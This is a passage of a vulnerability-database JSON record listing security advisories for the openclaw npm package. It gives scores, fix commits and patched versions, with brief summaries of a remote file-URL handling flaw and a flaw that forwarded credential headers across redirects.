5cmg","reference_id":"GHSA-9p3r-hh9g-5cmg","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9p3r-hh9g-5cmg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41296","GHSA-9p3r-hh9g-5cmg"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xvhd-w4tv-tqhr"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91425?format=json","vulnerability_id":"VCID-xyck-sspa-4ba2","summary":"OpenClaw: Windows media loaders accepted remote-host file URLs before local path validation\n## Summary\nWindows local-media handling accepted remote-host file URLs and UNC-style paths before local-path validation, so network-hosted file targets could be treated as local content.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5`\n- `93880717f1cd34feaa45e74e939b7a5256288901`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/local-file-access.ts now rejects remote-host file: URLs and UNC/network paths as non-local input.\n- src/media/web-media.ts, src/media-understanding/attachments.normalize.ts, and src/agents/sandbox-paths.ts all route through the shared local-file guard.\n\nOpenClaw thanks @RacerZ-fighting, @Fushuling for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34426","reference_id":"","reference_type":"","scores":[{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.15181","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.15223","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00048","scoring_system":"epss","scoring_elements":"0.15233","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34426"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/4fd7feb0fd4ec16c48ed983980dba79a09b3aaf5"},{"reference_url":"https://github.com/openclaw/openclaw/commit/93880717f1cd34feaa45e74e939b7a5256288901","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/93880717f1cd34feaa45e74e939b7a5256288901"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b57b680c0c34de907d57f60c38fb358e82aef8f7"},{"reference_url":"https://github.com/openclaw/openclaw/pull/59182","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/"}],"url":"https://github.com/openclaw/openclaw/pull/59182"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3x4-hc5v-v2gm","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h3x4-hc5v-v2gm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34426","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34426"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:H/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T16:16:50Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-approval-bypass-via-environment-variable-normalization"},{"reference_url":"https://github.com/advisories/GHSA-h3x4-hc5v-v2gm","reference_id":"GHSA-h3x4-hc5v-v2gm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h3x4-hc5v-v2gm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-34426","GHSA-h3x4-hc5v-v2gm"],"risk_score":3.4,"exploitability":"0.5","weighted_severity":"6.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xyck-sspa-4ba2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89013?format=json","vulnerability_id":"VCID-xz8s-hj5s-wfgj","summary":"OpenClaw: Media download follows cross-origin redirects with Authorization headers intact\n## Summary\nMedia download follows cross-origin redirects with Authorization headers intact\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Shipped v2026.3.28 media downloads forwarded Authorization across cross-origin redirects, a real in-scope credential-leak class that fits medium.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f` — 2026-03-31T19:57:42+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e704323ff388ed21f6963f9b8e0b1b8dfaaabc5f"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68v4-hmwv-f43h","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68v4-hmwv-f43h"},{"reference_url":"https://github.com/advisories/GHSA-68v4-hmwv-f43h","reference_id":"GHSA-68v4-hmwv-f43h","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-68v4-hmwv-f43h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-p